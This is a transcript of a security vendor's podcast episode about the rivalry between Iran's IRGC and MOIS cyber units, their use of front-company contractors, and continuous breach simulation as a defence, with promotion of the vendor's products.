Iran’s Cyber Shadow War: IRGC, MOIS, and the Battle for Control

Welcome back to the cyber resilience brief, a safe breach podcast. I’m Tova Devoreen, your host, and I’m here with Adrian Culley, my cohost and our leads offensive cybersecurity engineer at safe breach. In our last episode on Iran, we looked at the big bang, Stuxnet, and how it forced Iran to build a digital arsenal from the ashes. Thank you, everybody, for joining us back in the SafeBreach studios. Today, we’re going to go inside the machine following on from our first episode. If you want to defend against a threat, you have to understand who’s signing the checks. And in Iran, those checks come from a divided house. And we’re not talking about Hogwarts. We’re talking about the rivalry between the IRGC, the Iran the Iranian Revolutionary Guard, and the MOIS, the ministry the ministry of intelligence and security. Adrian, our work suggests that this isn’t just a bureaucratic overlap. It’s an all out competition. Tova, it’s Game of Thrones in cyberspace. House IRGC, house MOIS. Winter is coming. That competition has massive implications for how they target Western infrastructure. Okay. Let’s start with the players, and let’s talk about why this works. Let’s start with the IRGC. They are the guardians of the revolution. I personally have encountered them as a former journalist only in terms of physical threats and IRL military moves. What’s their DNA in terms of cyber? So the IRGC, Tovar, is the muscle. They’re ideologically driven, aggressive, and often less concerned with stealth. Think for episode one there about the Shamoon attack on Saudi Aramco. Their units like the IRGC CEC, the Cyber Electronic Command, focused on hard targets, critical infrastructure, military contractors, direct disruption wherever they can. When you see an attack on the US water utility or allowed hack and leak operation, that’s usually IRGC backed. They want you to know they were there. Okay, and then you have on the other hand the Ministry of Intelligence Security, the MOIS. They’re the civilian intelligence agency, right? The MOIS, correct. They’re the descendants of what was the former Shah Vahran’s Savak, think of them as being the I’s, they’re more aligned with traditional espionage. They focus on long term intelligence gathering, telecommunications, finance. Their goal isn’t to break things, much more subtle, It’s to sit quietly on a network for years, harvesting data. Groups like Muddy Water or Oil Rig, who we’ll dive into in the next episode, are their primary tools and presence. A really interesting dynamic here. Be because these two agencies are competing for the supreme leader’s favor, they often target the same victims using different methods. And, you know, we’ve seen this in other areas as well. We’ve seen it with North Korea in particular is what I’m thinking about. What’s the logic here of introducing internal competition? How does it make for effective cybercrime, and why are we seeing it across the creek nexus? So it’s interesting. Wherever you get military systems you get hierarchies, wherever you get discipline systems, and wherever you get military hierarchies you get cut by rivalry. In most organizations it’s actively encouraged. The problem here with the IRGC, CEC and MOIS is they’ve both actually got the ability to be very, very disruptive and very, very disruptive. So for those of us in the West, their cat badge rivalry sometimes translates into very real kinetic disruptive activity, and that’s a noise problem for defenders. You might see a blunt, sloppy IRGC phishing attempt on Monday, and whilst your SOC is busy dealing with that and clearing it up, there’s a Ministry of State Security operative, MOIS operative, using the distraction to slip through in a much more sophisticated backdoor. They use each other’s operations as unintended smoke screens. Interesting. And we’ll get more into that with Russia as well for those listeners who are following, so stay tuned. They have more than one organization operating there. One thing that really stands out in our work is that the Iranian government doesn’t just hire hackers as soldiers. They have the contractor model. Tell us a little bit about that. So this is the the secret source of their deniability, Tovar. Imagine a private software company in downtown Tehran. On the surface, they develop mobile apps or do IT consulting. But in reality, they’re a dedicated cell for the IRGC. Right. We’ve seen this with companies in the case of Emmett Passer Guard, which we covered on a previous episode. Exactly. Many of those companies are now sanctioned by the West, many of their staff are wanted criminals, so these contractors are agile. They don’t have the red tape of a government agency, they can experiment with new malware, use off the shelf hacking tools, and if they get caught, all the Iranian government says is we have no idea who these people are. They’re just private citizens. Plausible deniability at its best, and it makes attribution a nightmare. It’s why, you know, the Western government and intelligence agencies tread very carefully when it comes to attribution. It is not for the faint hearted. It’s very difficult, and these intelligence agency backed threat groups are actively seeking to make attribution very difficult. But they do leave footprints. The contractors often reuse code across different front companies. We’re aware that even when they change their names or IP addresses, the behavioral patterns, how they move laterally, how they exfiltrate data stay the same, their footprints and fingerprints. And as defenders, this is where we focus. Quick pause. Do we actually break down our typical TTPs and IOCs in the next episode? I haven’t seen the other scripts yet. We we do. We we maybe look at that in terms of getting deeper in and referring to one of our scenarios, but we do. Yeah. Okay. Fine. Yeah. And we’ll and we’ll dig deeper into the Iranian TTPs and IOCs in future episodes where you’ll be able to tell who might be breaking into your systems. But anyway, Adrianne, that does bring us back to the Safegree’s perspective. If we’re facing two different agencies, two different styles, but from one threat actor, and one of those styles is loud and aggressive and the other one is quiet and sneaky, I think we’re looking at a good continuous automated red teaming situation here from our product suite. What can what can we say about that? So this is where the continuous part of CTEM is vital. If you only test your defenses against known threats once a month, you’re missing the evolution of these contractors. Right. Because how so? Like, we know that. So you’d say, what what is it that we’re looking for here, Adrian? What is it that we look what what is it that we’re looking for, Adrian? So let’s take the IRGC’s loud style. We can use buzz to simulate their aggressive wiper tactics. We validate that your EDR will block the specific payload, but then we use SafeBridge propagate to mimic the MOIS style. So we’re actually emulating them at this point, the stealthy lateral movement. Right. This is where the entire platform together works as a whole, where you also have FAST looking in from the outside in and Propagate, which is attack path validation looking from the inside out. It looks for in how an attacker moves after they get in. Exactly, Tovar. It’s about quantifying the blast radius. If an MIS contractor gets a foothold in your marketing department, can they find a path to the financial servers? Propagate automates that red teaming logic. It doesn’t just check if a door is locked, it tries to see if a window is open, if there’s a crawl space, if there’s ducting vents it can get through to extend this analogy, is there a spare key under the mat, is the combination to the key safe on the wall guesstable. It we go through with propagate as many attack paths as possible to see can we get in, and this is where we’re emulating the attacker. We’re doing what they would do. Exactly. And because we see that these Iranian actors are increasingly living off the land using your own admin tools against you, not only will standard antivirus will catch them, but in general, when we looked at a year’s worth of attack data recently, that’s one point eight million simulations. And most companies are only seeing blocked action sixty percent of the time. So it’s extra, extra important to take careful look at your tests and run those tests frequently. So if you think about an analogy, Tova, legacy antivirus is hash based, they’re taking a binary piece of code, they’re calculating a hash value as a fingerprint, and they’re saying, do we know whether that’s good or bad? That’s like trying to lower crime by reading car number plates. Just because you get the number plate of the car doesn’t actually tell you anything about what’s going on inside that car or what the occupants of the car are going to do when they leave the car or what they did before they got into the car. Living off the land, we look at, for example, the PowerShell, they’re using WMI to a standard security tool. Looks like normal IT admin doing what they should be doing with WMI, but with adversarial exposure validation, can tell the difference. We can show you, hey, this PowerShell script isn’t coming from your admin. It’s following a pattern we’ve seen with Iranian contractors. Yeah. Another reason why continuous validation is so important. Now looking ahead for twenty twenty six, we’re recording this in January. We’re expecting this to air at end of January, early February. Do we expect this rivalry to continue? Are they getting better at working together, or do we think that world events might topple it entirely? What’s your prediction? So what we’re starting to see is their sharing infrastructure. We’re seeing more and more cases where the MOIS provides the initial access, so they’re their own internal initial access broker, they’re doing the breaking in, and then they’re handing the keys over to the IRGC for the destruction of the leak. As the regime crumbles in Iran, we should anticipate far more desperate actions, them not being so concerned about the tradecraft and maintaining that low profile persistence, and then lashing out causing as much destruction as they can. That’s a terrifying tag team. It is. It means the quiet phase is getting shorter and may well be over. If you don’t catch the spy within the first forty eight hours, the vandal is going to show up and burn the house down. That’s why exposure validation has to be real time. You need to know what your dwell time is is is, and you need to be working on getting it effectively to zero. You can’t have these attackers dwelling in your system. Okay. So the command centers are divided, but their impact is doubling. We’ve gone from the big bang to the shadow bureaucracy. And next time we’ll be putting names to faces, we’re going to look at the big three of Iranian APTs, a p t thirty three, oil rig, and muddy water. These are groups that are actually in the trenches and in your networks. The good news is SafeBreach, SafeBreach Labs, our researchers have cutting edge in-depth knowledge of the behaviors of the tactics, techniques, and procedures used by these groups, and we empower you to both simulate and emulate these attacks before you get hit. Absolutely. We’re going to break down their favorite tools and more importantly, how you could use an adversarial exposure validation platform like SafeBreach to make sure their tools never work on you. Look forward to seeing you then. That’s right. Listeners, thank you so much for being here. I’m Topha Devoren. And I’m Adrian. This has been the cyber resilience brief. And until next time, stay safe. Stay safe with SafeReach.